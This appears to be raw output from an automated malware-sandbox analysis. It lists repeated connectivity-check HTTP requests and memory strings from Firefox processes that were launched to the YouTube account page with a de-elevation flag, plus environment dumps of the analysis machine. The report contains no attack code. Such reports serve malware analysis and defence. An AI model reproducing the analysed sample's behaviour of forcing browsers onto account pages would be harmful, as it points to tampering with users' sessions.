Source: global traffic	HTTP traffic detected: GET /success.txt?ipv4 HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: /Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateConnection: keep-alivePragma: no-cacheCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /canonical.html HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: /Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateCache-Control: no-cachePragma: no-cacheConnection: keep-alive
Source: global traffic	HTTP traffic detected: GET /success.txt?ipv4 HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: /Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateConnection: keep-alivePragma: no-cacheCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /canonical.html HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: /Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateCache-Control: no-cachePragma: no-cacheConnection: keep-alive
Source: global traffic	HTTP traffic detected: GET /success.txt?ipv4 HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: /Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateConnection: keep-alivePragma: no-cacheCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /canonical.html HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: /Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateCache-Control: no-cachePragma: no-cacheConnection: keep-alive
Source: global traffic	HTTP traffic detected: GET /success.txt?ipv4 HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: /Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateConnection: keep-alivePragma: no-cacheCache-Control: no-cache

Source: firefox.exe, 00000016.00000003.2993742632.0000018932761000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: "url": "https://www.facebook.com/", equals www.facebook.com (Facebook)
Source: firefox.exe, 00000016.00000003.2993742632.0000018932761000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: "url": "https://www.youtube.com/", equals www.youtube.com (Youtube)
Source: firefox.exe, 00000011.00000002.2786986644.00000271F8E70000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 0000002A.00000002.3012330529.00000197D9F10000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: "C:\Program Files\Mozilla Firefox\firefox.exe" "https://www.youtube.com/account" equals www.youtube.com (Youtube)
Source: firefox.exe, 00000013.00000002.2813219119.000001729F300000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: "C:\Program Files\Mozilla Firefox\firefox.exe" https://www.youtube.com/account --attempting-deelevation equals www.youtube.com (Youtube)
Source: firefox.exe, 00000013.00000002.2813219119.000001729F300000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: "C:\Program Files\Mozilla Firefox\firefox.exe" https://www.youtube.com/account --attempting-deelevationH equals www.youtube.com (Youtube)
Source: firefox.exe, 0000002B.00000002.3012524075.0000020633CB0000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 0000002B.00000002.3015863881.0000020634003000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: "C:\Program Files\Mozilla Firefox\firefox.exe" https://www.youtube.com/account equals www.youtube.com (Youtube)
Source: firefox.exe, 0000002B.00000002.3012524075.0000020633CB0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: "C:\Program Files\Mozilla Firefox\firefox.exe" https://www.youtube.com/accountO equals www.youtube.com (Youtube)
Source: firefox.exe, 00000016.00000003.3253256201.00000189372AD000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: ://www.everestjs.net/static/st.v3.js://.imgur.io/js/vendor..bundle.js://s.webtrends.com/js/webtrends.js://.moatads.com//moatheader.js://s.webtrends.com/js/webtrends.min.js://www.google-analytics.com/plugins/ua/ec.js://js.maxmind.com/js/apis/geoip2//geoip2.js://.imgur.com/js/vendor..bundle.js://ssl.google-analytics.com/ga.js://c.amazon-adsystem.com/aax2/apstag.js://static.chartbeat.com/js/chartbeat.js://www.rva311.com/static/js/main..chunk.js://auth.9c9media.ca/auth/main.js://static.criteo.net/js/ld/publishertag.js://web-assets.toggl.com/app/assets/scripts/.js://connect.facebook.net//all.js://www.google-analytics.com/analytics.js://www.google-analytics.com/gtm/js*://static.adsafeprotected.com/iasPET.1.js://www.googletagmanager.com/gtm.js*://imasdk.googleapis.com/js/sdkloader/ima3.js://pagead2.googlesyndication.com/tag/js/gpt.js*://cdn.adsafeprotected.com/iasPET.1.js://cdn.optimizely.com/public/.js://.vidible.tv//vidible-min.js://pub.doubleverify.com/signals/pub.js://connect.facebook.net//sdk.js://s0.2mdn.net/instream/html5/ima3.js://www.googletagservices.com/tag/js/gpt.js://adservex.media.net/videoAds.js://static.chartbeat.com/js/chartbeat_video.js://libs.coremetrics.com/eluminate.js://s.webtrends.com/js/advancedLinkTracking.js equals www.facebook.com (Facebook)
Source: firefox.exe, 00000016.00000003.3253058406.00000189372BC000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000016.00000003.3243875790.0000018945932000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: ://www.facebook.com/platform/impression.php equals www.facebook.com (Facebook)
Source: firefox.exe, 00000016.00000003.3069241995.00000189317EC000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: 8:https://www.youtube.com/account equals www.youtube.com (Youtube)
Source: firefox.exe, 00000016.00000003.3359286606.0000018944534000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000016.00000003.3357377046.00000189447C3000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000016.00000003.3359286606.0000018944539000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: 8https://www.facebook.com/ equals www.facebook.com (Facebook)
Source: firefox.exe, 00000016.00000003.3359286606.0000018944534000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000016.00000003.3357377046.00000189447C3000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000016.00000003.3357377046.0000018944721000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: 8https://www.youtube.com/ equals www.youtube.com (Youtube)
Source: firefox.exe, 00000016.00000003.3069241995.00000189317EC000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000016.00000003.2932981403.00000189378AE000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000016.00000003.3071435574.00000189317E4000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: 8https://www.youtube.com/account equals www.youtube.com (Youtube)
Source: firefox.exe, 00000011.00000002.2812209042.00000271FA960000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: 8p8https://www.youtube.com/account --attempting-deelevationUser equals www.youtube.com (Youtube)
Source: firefox.exe, 00000016.00000003.3174264142.000001893689F000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000016.00000003.3063650465.00000189368A3000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000016.00000003.2878072172.00000189368A3000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: 8www.facebook.com equals www.facebook.com (Facebook)
Source: firefox.exe, 00000016.00000003.3069241995.00000189317EC000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: :https://www.youtube.com/account equals www.youtube.com (Youtube)
Source: firefox.exe, 0000002B.00000002.3015090796.0000020633E70000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: =::=::\=C:=C:\Users\user\1000003002ALLUSERSPROFILE=C:\ProgramDataAPPDATA=C:\Users\user\AppData\Roamingb2eincfilepath=C:\Users\user\100000~1chromePath=C:\Program Files\Google\Chrome\Application\chrome.exeCommonProgramFiles=C:\Program Files\Common FilesCommonProgramFiles(x86)=C:\Program Files (x86)\Common FilesCommonProgramW6432=C:\Program Files\Common FilesCOMPUTERNAME=user-PCComSpec=C:\Windows\system32\cmd.exeDriverData=C:\Windows\System32\Drivers\DriverDataedgePath=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exefirefoxPath=C:\Program Files\Mozilla Firefox\firefox.exeFPS_BROWSER_APP_PROFILE_STRING=Internet ExplorerFPS_BROWSER_USER_PROFILE_STRING=DefaultHOMEDRIVE=C:HOMEPATH=\Users\userLOCALAPPDATA=C:\Users\user\AppData\LocalLOGONSERVER=\\user-PCMOZ_CRASHREPORTER_DATA_DIRECTORY=C:\Users\user\AppData\Roaming\Mozilla\Firefox\Crash ReportsMOZ_CRASHREPORTER_EVENTS_DIRECTORY=C:\Users\user\AppData\Roaming\Mozilla\Firefox\Crash Reports\eventsMOZ_CRASHREPORTER_PING_DIRECTORY=C:\Users\user\AppData\Roaming\Mozilla\Firefox\Pending PingsMOZ_CRASHREPORTER_RESTART_ARG_0=C:\Program Files\Mozilla Firefox\firefox.exeMOZ_CRASHREPORTER_RESTART_ARG_1=https://www.youtube.com/accountMOZ_CRASHREPORTER_STRINGS_OVERRIDE=C:\Program Files\Mozilla Firefox\browser\crashreporter-override.iniNUMBER_OF_PROCESSORS=2OneDrive=C:\Users\user\OneDriveOS=Windows_NTPath=C:\Program Files (x86)\Common Files\Oracle\Java\javapath;C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\;C:\Windows\System32\OpenSSH\;C:\Users\user\AppData\Local\Microsoft\WindowsApps;PATHEXT=.COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSCPROCESSOR_ARCHITECTURE=AMD64PROCESSOR_IDENTIFIER=Intel64 Family 6 Model 143 Stepping 8, GenuineIntelPROCESSOR_LEVEL=6PROCESSOR_REVISION=8f08ProgramData=C:\ProgramDataProgramFiles=C:\Program FilesProgramFiles(x86)=C:\Program Files (x86)ProgramFiles64=C:\Program FilesProgramFiles86=C:\Program Files (x86)ProgramW6432=C:\Program FilesPROMPT=$P$GPSModulePath=C:\Program Files (x86)\WindowsPowerShell\Modules;C:\Windows\system32\WindowsPowerShell\v1.0\Modules;C:\Program Files (x86)\AutoIt3\AutoItXPUBLIC=C:\Users\PublicSESSIONNAME=ConsoleSystemDrive=C:SystemRoot=C:\WindowsTEMP=C:\Users\user\AppData\Local\TempTMP=C:\Users\user\AppData\Local\TempURL=https://www.youtube.com/accountUSERDOMAIN=user-PCUSERDOMAIN_ROAMINGPROFILE=user-PCUSERNAME=userUSERPROFILE=C:\Users\userwindir=C:\Windowsram Filt equals www.youtube.com (Youtube)
Source: firefox.exe, 0000002A.00000002.3012330529.00000197D9F10000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: =::=::\=C:=C:\Users\user\1000003002ALLUSERSPROFILE=C:\ProgramDataAPPDATA=C:\Users\user\AppData\Roamingb2eincfilepath=C:\Users\user\100000~1chromePath=C:\Program Files\Google\Chrome\Application\chrome.exeCommonProgramFiles=C:\Program Files\Common FilesCommonProgramFiles(x86)=C:\Program Files (x86)\Common FilesCommonProgramW6432=C:\Program Files\Common FilesCOMPUTERNAME=user-PCComSpec=C:\Windows\system32\cmd.exeDriverData=C:\Windows\System32\Drivers\DriverDataedgePath=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exefirefoxPath=C:\Program Files\Mozilla Firefox\firefox.exeFPS_BROWSER_APP_PROFILE_STRING=Internet ExplorerFPS_BROWSER_USER_PROFILE_STRING=DefaultHOMEDRIVE=C:HOMEPATH=\Users\userLOCALAPPDATA=C:\Users\user\AppData\LocalLOGONSERVER=\\user-PCNUMBER_OF_PROCESSORS=2OneDrive=C:\Users\user\OneDriveOS=Windows_NTPath=C:\Program Files (x86)\Common Files\Oracle\Java\javapath;C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\;C:\Windows\System32\OpenSSH\;C:\Users\user\AppData\Local\Microsoft\WindowsApps;PATHEXT=.COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSCPROCESSOR_ARCHITECTURE=AMD64PROCESSOR_IDENTIFIER=Intel64 Family 6 Model 143 Stepping 8, GenuineIntelPROCESSOR_LEVEL=6PROCESSOR_REVISION=8f08ProgramData=C:\ProgramDataProgramFiles=C:\Program FilesProgramFiles(x86)=C:\Program Files (x86)ProgramFiles64=C:\Program FilesProgramFiles86=C:\Program Files (x86)ProgramW6432=C:\Program FilesPROMPT=$P$GPSModulePath=C:\Program Files (x86)\WindowsPowerShell\Modules;C:\Windows\system32\WindowsPowerShell\v1.0\Modules;C:\Program Files (x86)\AutoIt3\AutoItXPUBLIC=C:\Users\PublicSESSIONNAME=ConsoleSystemDrive=C:SystemRoot=C:\WindowsTEMP=C:\Users\user\AppData\Local\TempTMP=C:\Users\user\AppData\Local\TempURL=https://www.youtube.com/accountUSERDOMAIN=user-PCUSERDOMAIN_ROAMINGPROFILE=user-PCUSERNAME=userUSERPROFILE=C:\Users\userwindir=C:\Windows equals www.youtube.com (Youtube)
Source: firefox.exe, 00000011.00000003.2764798353.00000271F8EA8000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 00000011.00000002.2786986644.00000271F8E70000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 00000011.00000002.2786986644.00000271F8EA8000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: =C:=C:\Windows\System32ALLUSERSPROFILE=C:\ProgramDataAPPDATA=C:\Users\user\AppData\Roamingb2eincfilepath=C:\Windows\system32chromePath=C:\Program Files\Google\Chrome\Application\chrome.exeCommonProgramFiles=C:\Program Files\Common FilesCommonProgramFiles(x86)=C:\Program Files (x86)\Common FilesCommonProgramW6432=C:\Program Files\Common FilesCOMPUTERNAME=user-PCComSpec=C:\Windows\system32\cmd.exeDriverData=C:\Windows\System32\Drivers\DriverDataedgePath=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exefirefoxPath=C:\Program Files\Mozilla Firefox\firefox.exeFPS_BROWSER_APP_PROFILE_STRING=Internet ExplorerFPS_BROWSER_USER_PROFILE_STRING=DefaultHOMEDRIVE=C:HOMEPATH=\Users\userLOCALAPPDATA=C:\Users\user\AppData\LocalLOGONSERVER=\\user-PCNUMBER_OF_PROCESSORS=2OneDrive=C:\Users\user\OneDriveOS=Windows_NTPath=C:\Program Files (x86)\Common Files\Oracle\Java\javapath;C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\;C:\Windows\System32\OpenSSH\;C:\Users\user\AppData\Local\Microsoft\WindowsAppsPATHEXT=.COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSCPROCESSOR_ARCHITECTURE=AMD64PROCESSOR_IDENTIFIER=Intel64 Family 6 Model 143 Stepping 8, GenuineIntelPROCESSOR_LEVEL=6PROCESSOR_REVISION=8f08ProgramData=C:\ProgramDataProgramFiles=C:\Program FilesProgramFiles(x86)=C:\Program Files (x86)ProgramFiles64=C:\Program FilesProgramFiles86=C:\Program Files (x86)ProgramW6432=C:\Program FilesPROMPT=$P$GPSModulePath=%ProgramFiles(x86)%\WindowsPowerShell\Modules;C:\Windows\system32\WindowsPowerShell\v1.0\Modules;C:\Program Files (x86)\AutoIt3\AutoItXPUBLIC=C:\Users\PublicSystemDrive=C:SystemRoot=C:\WindowsTEMP=C:\Users\user\AppData\Local\TempTMP=C:\Users\user\AppData\Local\TempURL=https://www.youtube.com/accountUSERDOMAIN=user-PCUSERDOMAIN_ROAMINGPROFILE=user-PCUSERNAME=userUSERPROFILE=C:\Users\userwindir=C:\Windows equals www.youtube.com (Youtube)
Source: firefox.exe, 0000002B.00000002.3015381995.0000020633FA4000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: ALLUSERSPROFILE=C:\ProgramDataAPPDATA=C:\Users\user\AppData\Roamingb2eincfilepath=C:\Users\user\100000~1chromePath=C:\Program Files\Google\Chrome\Application\chrome.exeCommonProgramFiles=C:\Program Files\Common FilesCommonProgramFiles(x86)=C:\Program Files (x86)\Common FilesCommonProgramW6432=C:\Program Files\Common FilesCOMPUTERNAME=user-PCComSpec=C:\Windows\system32\cmd.exeDriverData=C:\Windows\System32\Drivers\DriverDataedgePath=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exefirefoxPath=C:\Program Files\Mozilla Firefox\firefox.exeFPS_BROWSER_APP_PROFILE_STRING=Internet ExplorerFPS_BROWSER_USER_PROFILE_STRING=DefaultHOMEDRIVE=C:HOMEPATH=\Users\userLOCALAPPDATA=C:\Users\user\AppData\LocalLOGONSERVER=\\user-PCNUMBER_OF_PROCESSORS=2OneDrive=C:\Users\user\OneDriveOS=Windows_NTPath=C:\Program Files (x86)\Common Files\Oracle\Java\javapath;C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\;C:\Windows\System32\OpenSSH\;C:\Users\user\AppData\Local\Microsoft\WindowsApps;PATHEXT=.COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSCPROCESSOR_ARCHITECTURE=AMD64PROCESSOR_IDENTIFIER=Intel64 Family 6 Model 143 Stepping 8, GenuineIntelPROCESSOR_LEVEL=6PROCESSOR_REVISION=8f08ProgramData=C:\ProgramDataProgramFiles=C:\Program FilesProgramFiles(x86)=C:\Program Files (x86)ProgramFiles64=C:\Program FilesProgramFiles86=C:\Program Files (x86)ProgramW6432=C:\Program FilesPROMPT=$P$GPSModulePath=C:\Program Files (x86)\WindowsPowerShell\Modules;C:\Windows\system32\WindowsPowerShell\v1.0\Modules;C:\Program Files (x86)\AutoIt3\AutoItXPUBLIC=C:\Users\PublicSESSIONNAME=ConsoleSystemDrive=C:SystemRoot=C:\WindowsTEMP=C:\Users\user\AppData\Local\TempTMP=C:\Users\user\AppData\Local\TempURL=https://www.youtube.com/accountUSERDOMAIN=user-PCUSERDOMAIN_ROAMINGPROFILE=user-PCUSERNAME=userUSERPROFILE=C:\Users\userwindir=C:\Windows= equals www.youtube.com (Youtube)
Source: firefox.exe, 0000002A.00000002.3013910159.00000197DA1B4000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: ALLUSERSPROFILE=C:\ProgramDataAPPDATA=C:\Users\user\AppData\Roamingb2eincfilepath=C:\Users\user\100000~1chromePath=C:\Program Files\Google\Chrome\Application\chrome.exeCommonProgramFiles=C:\Program Files\Common FilesCommonProgramFiles(x86)=C:\Program Files (x86)\Common FilesCommonProgramW6432=C:\Program Files\Common FilesCOMPUTERNAME=user-PCComSpec=C:\Windows\system32\cmd.exeDriverData=C:\Windows\System32\Drivers\DriverDataedgePath=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exefirefoxPath=C:\Program Files\Mozilla Firefox\firefox.exeFPS_BROWSER_APP_PROFILE_STRING=Internet ExplorerFPS_BROWSER_USER_PROFILE_STRING=DefaultHOMEDRIVE=C:HOMEPATH=\Users\userLOCALAPPDATA=C:\Users\user\AppData\LocalLOGONSERVER=\\user-PCNUMBER_OF_PROCESSORS=2OneDrive=C:\Users\user\OneDriveOS=Windows_NTPath=C:\Program Files (x86)\Common Files\Oracle\Java\javapath;C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\;C:\Windows\System32\OpenSSH\;C:\Users\user\AppData\Local\Microsoft\WindowsApps;PATHEXT=.COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSCPROCESSOR_ARCHITECTURE=AMD64PROCESSOR_IDENTIFIER=Intel64 Family 6 Model 143 Stepping 8, GenuineIntelPROCESSOR_LEVEL=6PROCESSOR_REVISION=8f08ProgramData=C:\ProgramDataProgramFiles=C:\Program FilesProgramFiles(x86)=C:\Program Files (x86)ProgramFiles64=C:\Program FilesProgramFiles86=C:\Program Files (x86)ProgramW6432=C:\Program FilesPROMPT=$P$GPSModulePath=C:\Program Files (x86)\WindowsPowerShell\Modules;C:\Windows\system32\WindowsPowerShell\v1.0\Modules;C:\Program Files (x86)\AutoIt3\AutoItXPUBLIC=C:\Users\PublicSESSIONNAME=ConsoleSystemDrive=C:SystemRoot=C:\WindowsTEMP=C:\Users\user\AppData\Local\TempTMP=C:\Users\user\AppData\Local\TempURL=https://www.youtube.com/accountUSERDOMAIN=user-PCUSERDOMAIN_ROAMINGPROFILE=user-PCUSERNAME=userUSERPROFILE=C:\Users\userwindir=C:\WindowsLrX0 equals www.youtube.com (Youtube)
Source: firefox.exe, 00000011.00000002.2784283721.00000271F8DF0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: ALLUSERSPROFILE=C:\ProgramDataAPPDATA=C:\Users\user\AppData\Roamingb2eincfilepath=C:\Windows\system32chromePath=C:\Program Files\Google\Chrome\Application\chrome.exeCommonProgramFiles=C:\Program Files\Common FilesCommonProgramFiles(x86)=C:\Program Files (x86)\Common FilesCommonProgramW6432=C:\Program Files\Common FilesCOMPUTERNAME=user-PCComSpec=C:\Windows\system32\cmd.exeDriverData=C:\Windows\System32\Drivers\DriverDataedgePath=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exefirefoxPath=C:\Program Files\Mozilla Firefox\firefox.exeFPS_BROWSER_APP_PROFILE_STRING=Internet ExplorerFPS_BROWSER_USER_PROFILE_STRING=DefaultHOMEDRIVE=C:HOMEPATH=\Users\userLOCALAPPDATA=C:\Users\user\AppData\LocalLOGONSERVER=\\user-PCNUMBER_OF_PROCESSORS=2OneDrive=C:\Users\user\OneDriveOS=Windows_NTPath=C:\Program Files (x86)\Common Files\Oracle\Java\javapath;C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\;C:\Windows\System32\OpenSSH\;C:\Users\user\AppData\Local\Microsoft\WindowsAppsPATHEXT=.COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSCPROCESSOR_ARCHITECTURE=AMD64PROCESSOR_IDENTIFIER=Intel64 Family 6 Model 143 Stepping 8, GenuineIntelPROCESSOR_LEVEL=6PROCESSOR_REVISION=8f08ProgramData=C:\ProgramDataProgramFiles=C:\Program FilesProgramFiles(x86)=C:\Program Files (x86)ProgramFiles64=C:\Program FilesProgramFiles86=C:\Program Files (x86)ProgramW6432=C:\Program FilesPROMPT=$P$GPSModulePath=%ProgramFiles(x86)%\WindowsPowerShell\Modules;C:\Windows\system32\WindowsPowerShell\v1.0\Modules;C:\Program Files (x86)\AutoIt3\AutoItXPUBLIC=C:\Users\PublicSystemDrive=C:SystemRoot=C:\WindowsTEMP=C:\Users\user\AppData\Local\TempTMP=C:\Users\user\AppData\Local\TempURL=https://www.youtube.com/accountUSERDOMAIN=user-PCUSERDOMAIN_ROAMINGPROFILE=user-PCUSERNAME=userUSERPROFILE=C:\Users\userwindir=C:\Windowspb equals www.youtube.com (Youtube)
Source: firefox.exe, 00000011.00000002.2786986644.00000271F8E70000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 0000002A.00000002.3012330529.00000197D9F10000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 0000002B.00000002.3012524075.0000020633CBA000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: C:\Program Files\Mozilla Firefox\firefox.exehttps://www.youtube.com/account equals www.youtube.com (Youtube)
Source: firefox.exe, 00000013.00000002.2813219119.000001729F300000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: C:\Program Files\Mozilla Firefox\firefox.exehttps://www.youtube.com/account--attempting-deelevation equals www.youtube.com (Youtube)
Source: firefox.exe, 0000002A.00000002.3012330529.00000197D9F10000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: C:\Users\user\1000003002\C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" "https://www.youtube.com/account"Winsta0\Default equals www.youtube.com (Youtube)
Source: firefox.exe, 0000002B.00000002.3012524075.0000020633CB0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: C:\Users\user\1000003002\C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" https://www.youtube.com/accountC:\Program Files\Mozilla Firefox\firefox.exeWinsta0\Default equals www.youtube.com (Youtube)
Source: firefox.exe, 00000011.00000002.2786986644.00000271F8E70000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: C:\Windows\system32\C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" "https://www.youtube.com/account"winsta0\default equals www.youtube.com (Youtube)
Source: firefox.exe, 00000013.00000002.2813219119.000001729F300000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: C:\Windows\system32\C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" https://www.youtube.com/account --attempting-deelevationC:\Program Files\Mozilla Firefox\firefox.exeWinsta0\Default equals www.youtube.com (Youtube)
Source: firefox.exe, 0000002B.00000002.3015863881.0000020634008000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000002B.00000002.3015090796.0000020633E70000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 0000002B.00000002.3012524075.0000020633CBA000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: MOZ_CRASHREPORTER_RESTART_ARG_1=https://www.youtube.com/account equals www.youtube.com (Youtube)
Source: firefox.exe, 00000016.00000003.3153426972.0000018937DC9000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: Nabout:certerror?e=nssBadCert&u=https%3A//www.youtube.com/account&c=UTF-8&d=%20 equals www.youtube.com (Youtube)
Source: firefox.exe, 00000016.00000003.3073945047.00000189317CA000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: O^partitionKey=%28https%2Cyoutube.com%29,:https://www.youtube.com/account equals www.youtube.com (Youtube)
Source: firefox.exe, 0000002B.00000002.3015090796.0000020633E70000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: RTER_RESTART_ARG_0=C:\Program Files\Mozilla Firefox\firefox.exeMOZ_CRASHREPORTER_RESTART_ARG_1=https://www.youtube.com/accountNUMB equals www.youtube.com (Youtube)
Source: firefox.exe, 00000011.00000002.2786986644.00000271F8E79000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 00000011.00000002.2784283721.00000271F8DF0000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 0000002A.00000002.3013910159.00000197DA1B0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: URL=https://www.youtube.com/account equals www.youtube.com (Youtube)
Source: firefox.exe, 0000002B.00000002.3012524075.0000020633CBA000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: URL=https://www.youtube.com/account+J equals www.youtube.com (Youtube)
Source: firefox.exe, 0000002A.00000002.3012330529.00000197D9F19000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: URL=https://www.youtube.com/accountJ equals www.youtube.com (Youtube)
Source: firefox.exe, 0000002B.00000002.3012524075.0000020633CBA000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: URL=https://www.youtube.com/accountr! equals www.youtube.com (Youtube)
Source: firefox.exe, 00000011.00000002.2786986644.00000271F8E79000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: URL=https://www.youtube.com/accountwm equals www.youtube.com (Youtube)
Source: firefox.exe, 00000016.00000003.3384064641.0000018945A72000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000016.00000003.3382756337.0000018945AC2000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000016.00000003.3356229366.00000189451DD000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: about:certerror?e=nssBadCert&u=https%3A//www.youtube.com/account&c=UTF-8&d=%20 equals www.youtube.com (Youtube)
Source: firefox.exe, 00000016.00000003.3153426972.0000018937DC9000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: ae=nssBadCert&u=https%3A//www.youtube.com/account&c=UTF-8&d=%20 equals www.youtube.com (Youtube)
Source: firefox.exe, 00000016.00000003.3357377046.00000189447C3000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000016.00000003.3382756337.0000018945AC2000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000016.00000003.3153426972.0000018937DC9000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: e=nssBadCert&u=https%3A//www.youtube.com/account&c=UTF-8&d=%20 equals www.youtube.com (Youtube)
Source: firefox.exe, 00000016.00000003.3359286606.0000018944534000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000016.00000003.3357377046.00000189447C3000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000016.00000003.3359286606.0000018944539000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.facebook.com/ equals www.facebook.com (Facebook)
